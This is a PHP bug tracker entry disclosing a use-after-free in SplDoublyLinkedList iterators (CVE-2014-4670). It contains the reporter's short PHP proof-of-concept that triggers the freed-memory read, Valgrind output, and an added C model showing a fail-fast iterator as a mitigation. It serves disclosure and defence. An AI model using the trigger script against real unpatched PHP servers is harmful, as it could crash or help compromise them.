PHP :: Bug #67538 :: SPL Iterators use-after-free
| Bug #67538 | SPL Iterators use-after-free | | |
|---|---|---|---|
| Submitted: | 2014-06-29 14:54 UTC | Modified: | 2014-07-03 02:49 UTC |
| From: | research at insighti dot org | Assigned: | laruence (profile) |
| Status: | Closed | Package: | SPL related |
| PHP Version: | Irrelevant | OS: | * |
| Private report: | No | CVE-ID: | 2014-4670 |
[2014-06-29 14:54 UTC] research at insighti dot org
Description:
------------
SPL provides a set of iterators to traverse over objects (including internal iterators).
Changes in the object are not projected to the object iterators.
This results in iterators pointing to freed memory.
Calling next() on the iterator triggers a use-after-free.
Please use CVE-2014-4670 for this bug.
Test script:
---------------
<?php
$list = new SplDoublyLinkedList();
$list->push('a');
$list->push('b');
$list->rewind();          // internal iterator now points at the node holding 'a'
$list->offsetUnset(0);    // frees that node; the iterator still references it
$list->push('c');
$list->offsetUnset(0);    // frees the node holding 'b' as well
$list->next();            // follows the stale pointer: the use-after-free
Actual result:
--------------
$ USE_ZEND_ALLOC=0 valgrind /opt/php/5.5.14/bin/php test.php
==14274== Memcheck, a memory error detector
==14274== Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.
==14274== Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info
==14274== Command: /opt/php/5.5.14/bin/php test.php
==14274==
==14274== Invalid read of size 4
==14274== at 0x8367BCC: spl_dllist_it_helper_move_forward (spl_dllist.c:989)
==14274== by 0x852E1B1: zend_do_fcall_common_helper_SPEC (zend_vm_execute.h:550)
==14274== by 0x84F0935: execute_ex (zend_vm_execute.h:363)
==14274== by 0x8488C71: zend_execute_scripts (zend.c:1316)
==14274== by 0x842943A: php_execute_script (main.c:2506)
==14274== by 0x8531447: do_cli (php_cli.c:994)
==14274== by 0x808149B: main (php_cli.c:1378)
==14274== Address 0x716b748 is 8 bytes inside a block of size 16 free'd
==14274== at 0x402750C: free (vg_replace_malloc.c:427)
==14274== by 0x83688FF: zim_spl_SplDoublyLinkedList_offsetUnset (spl_dllist.c:922)
==14274== by 0x852E1B1: zend_do_fcall_common_helper_SPEC (zend_vm_execute.h:550)
==14274== by 0x84F0935: execute_ex (zend_vm_execute.h:363)
==14274== by 0x8488C71: zend_execute_scripts (zend.c:1316)
==14274== by 0x842943A: php_execute_script (main.c:2506)
==14274== by 0x8531447: do_cli (php_cli.c:994)
==14274== by 0x808149B: main (php_cli.c:1378)
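The trace above shows the shape of the bug: offsetUnset() frees a list node while the internal iterator still holds a raw pointer to it, and the next move_forward dereferences that pointer. The following C program is an added example, not the reporter's script and not PHP's spl_dllist.c; it models a doubly linked list with the same raw-pointer iterator and replays the report's sequence (push a, b; rewind; unset 0; push c; unset 0; next). The mitigation it demonstrates, a modification counter checked by the iterator (fail-fast iteration), is a hypothetical one chosen for illustration, not the fix PHP actually shipped. All names (`dll_t`, `dll_iter_t`, `mod_count`, `replay_bug_67538`) are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed model of the bug class (not PHP's spl_dllist.c): the iterator
 * keeps a raw node pointer like the SPL one, but records the list's
 * modification count at rewind() so next() refuses to touch a freed node. */

typedef struct node { struct node *prev, *next; char value; } node_t;

typedef struct {
    node_t *head, *tail;
    size_t count;
    unsigned long mod_count;  /* bumped on every structural change */
} dll_t;

typedef struct {
    dll_t *list;
    node_t *cur;              /* raw pointer: stale once the node is freed */
    unsigned long seen_mod;   /* list->mod_count observed at rewind() */
} dll_iter_t;

static void dll_init(dll_t *l) { l->head = l->tail = NULL; l->count = 0; l->mod_count = 0; }

static int dll_push(dll_t *l, char v) {
    node_t *n = calloc(1, sizeof *n);
    if (!n) return -1;
    n->value = v;
    n->prev = l->tail;
    if (l->tail) l->tail->next = n; else l->head = n;
    l->tail = n;
    l->count++; l->mod_count++;
    return 0;
}

/* Unlink and free the idx-th node: the free() seen in the Valgrind trace. */
static int dll_offset_unset(dll_t *l, size_t idx) {
    if (idx >= l->count) return -1;
    node_t *n = l->head;
    while (idx--) n = n->next;
    if (n->prev) n->prev->next = n->next; else l->head = n->next;
    if (n->next) n->next->prev = n->prev; else l->tail = n->prev;
    free(n);
    l->count--; l->mod_count++;
    return 0;
}

static void dll_free(dll_t *l) { while (l->count) dll_offset_unset(l, 0); }

static void iter_rewind(dll_iter_t *it, dll_t *l) {
    it->list = l; it->cur = l->head; it->seen_mod = l->mod_count;
}

/* 1: positioned on a live element, 0: past the end,
 * -1: the list changed since rewind(), so cur must not be dereferenced. */
static int iter_valid(const dll_iter_t *it) {
    if (it->seen_mod != it->list->mod_count) return -1;
    return it->cur != NULL;
}

/* The unchecked form of this step is where the SPL read of freed memory
 * happened (spl_dllist_it_helper_move_forward in the trace above). */
static int iter_next(dll_iter_t *it) {
    int state = iter_valid(it);
    if (state != 1) return state;
    it->cur = it->cur->next;
    return it->cur != NULL;
}

/* Replays the reporter's script against the model; returns what next() reports. */
int replay_bug_67538(void) {
    dll_t list;
    dll_iter_t it;
    dll_init(&list);
    dll_push(&list, 'a'); dll_push(&list, 'b');
    iter_rewind(&it, &list);      /* it.cur -> node 'a' */
    dll_offset_unset(&list, 0);   /* frees 'a'; it.cur is now dangling */
    dll_push(&list, 'c');
    dll_offset_unset(&list, 0);   /* frees 'b' */
    int r = iter_next(&it);       /* -1: refused instead of reading freed 'a' */
    dll_free(&list);
    return r;
}

/* Control case: an unmodified list is still walked end to end. */
int count_unmodified(void) {
    dll_t list;
    dll_iter_t it;
    int visited = 0;
    dll_init(&list);
    dll_push(&list, 'a'); dll_push(&list, 'b'); dll_push(&list, 'c');
    for (iter_rewind(&it, &list); iter_valid(&it) == 1; iter_next(&it)) visited++;
    dll_free(&list);
    return visited;
}

int main(void) {
    printf("replay: %d (expect -1), walk: %d (expect 3)\n", replay_bug_67538(), count_unmodified());
    return 0;
}
```

Running the model under Valgrind with the same invocation style as the report (`valgrind ./a.out`) reports no invalid reads, because the dangling `cur` pointer is never dereferenced once the counter mismatch is detected; the alternative design, where the list invalidates or re-points every live iterator on unlink, trades the extra bookkeeping for iterators that keep working after a mutation.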
[2014-06-29 19:20 UTC] stas@php.net
-Type: Security +Type: Bug
[2014-07-02 12:45 UTC] research at insighti dot org